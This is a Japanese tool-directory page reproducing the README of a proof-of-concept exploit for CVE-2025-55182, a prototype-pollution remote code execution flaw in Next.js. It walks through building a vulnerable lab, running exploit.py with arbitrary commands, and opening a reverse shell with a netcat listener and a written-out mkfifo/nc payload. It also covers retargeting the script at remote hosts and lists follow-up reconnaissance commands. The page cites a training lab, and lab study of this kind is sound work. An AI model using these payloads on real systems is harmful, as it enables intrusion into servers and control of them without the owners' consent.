Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
React2Shell-CVE-2025-55182 — CVE-2025-55182 の概念実証エクスプロイト。Next.js におけるプロトタイプ汚染を介したリモートコード実行を示します。認可されたテストおよびリバースシェル生成のための事前設定済み脆弱ラボを含みます。 | Kitploit
ツール/GitHubGitHub/rahul-securify/react2shell-cve-2025-55182
ペイロード生成エクスプロイトウェブアプリケーション悪用CTF学習と教育ラボと実践
GitHubrahul-securify/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

CVE-2025-55182 の概念実証エクスプロイト。Next.js におけるプロトタイプ汚染を介したリモートコード実行を示します。認可されたテストおよびリバースシェル生成のための事前設定済み脆弱ラボを含みます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
8ヶ月前未レビュー

React2Shell CVE-2025-55182

Next.js アプリケーションにおける React サーバーコンポーネントのレンダリングパイプラインでのプロトタイプ汚染を介したリモートコード実行の脆弱性を実証する Proof-of-Concept エクスプロイトです。

⚠️ 免責事項

このツールは教育および正規のテスト目的のみに使用されます。所有していない、またはテスト許可を得ていないシステムに対して不正に使用することは違法です。

📋 前提条件

  • Node.js (v16 以降)
  • Python 3.6+
  • netcat (リバースシェル用)
  • 脆弱な Next.js アプリケーション (このリポジトリに含まれています)

🚀 クイックスタート

オプション 1: 事前設定済みのラボを使用する

1. リポジトリをクローンする

root@kitploit:~
git clone https://github.com/securifyai/React2Shell-CVE-2025-55182.git
cd React2Shell-CVE-2025-55182

オプション 2: スクラッチからサーバーを作成する

root@kitploit:~
# 脆弱なバージョンで新しい Next.js アプリを作成する
npm create [email protected] react2shell-lab
# プロンプトが表示されたらすべてデフォルトで進める
cd react2shell-lab

注: 事前設定済みのラボには必要な脆弱なコードがすでに含まれています。スクラッチから作成する場合は、手動で脆弱なコンポーネントを追加する必要があります。

2. 依存関係をインストールする

root@kitploit:~
cd react2shell-lab
npm install

3. 脆弱なサーバーを起動する

ターミナル 1 で:

root@kitploit:~
npm run dev

サーバーが http://localhost:3000 で起動します。

🔧 エクスプロイト

基本的なコマンド実行

  1. リポジトリには脆弱性を示す exploit.py ファイルが含まれています。ファイル内の COMMAND 変数をお好みのコマンドに編集してください:

    root@kitploit:~
    COMMAND = 'whoami'  # 実行したい任意のコマンドに変更してください
    
  2. エクスプロイトを実行します:

    root@kitploit:~
    python3 exploit.py
    

リバースシェル

  1. 新しいターミナルで netcat リスナーをセットアップします:

    root@kitploit:~
    nc -nvlp 4444
    
  2. exploit.py を編集し、コマンドをリバースシェルペイロードに更新します:

    root@kitploit:~
    COMMAND = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f'
    

    YOUR_IP をあなたのローカルマシンの IP アドレスに置き換えてください。

  3. エクスプロイトを実行します:

    root@kitploit:~
    python3 exploit.py
    

🛠️ 高度な使用法

リモートターゲットのテスト

エクスプロイトスクリプトの HOST 変数を編集してリモートサーバーをターゲットにします:

root@kitploit:~
HOST = 'target-ip-address'  # ターゲットの IP に置き換え
PORT = 3000  # デフォルトの Next.js ポート

よく使うコマンド

  • ディレクトリ内容の一覧表示: ls -la
  • システム情報の取得: uname -a
  • 現在のユーザーの取得: whoami
  • ネットワーク情報の取得: ifconfig または ip a

🔍 トラブルシューティング

  • 接続が拒否された: ターゲットサーバーが実行中でアクセス可能であることを確認してください
  • コマンドが見つからない: ターゲットシステムに特定のバイナリがインストールされていない可能性があります
  • 出力がない: コマンドは実行されたが出力が生成されなかった可能性があります

📚 参考文献

  • CVE-2025-55182
  • Next.js セキュリティ勧告
  • JavaScript におけるプロトタイプ汚染

📄 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

このバージョンでは、リモートターゲットと攻撃者の IP およびポートの入力を求めます。また、POST ボディ (body_parts) もこのバージョンでは若干削減されています。

ソース:

https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained

https://tryhackme.com/room/react2shellcve202555182

ツールをダウンロード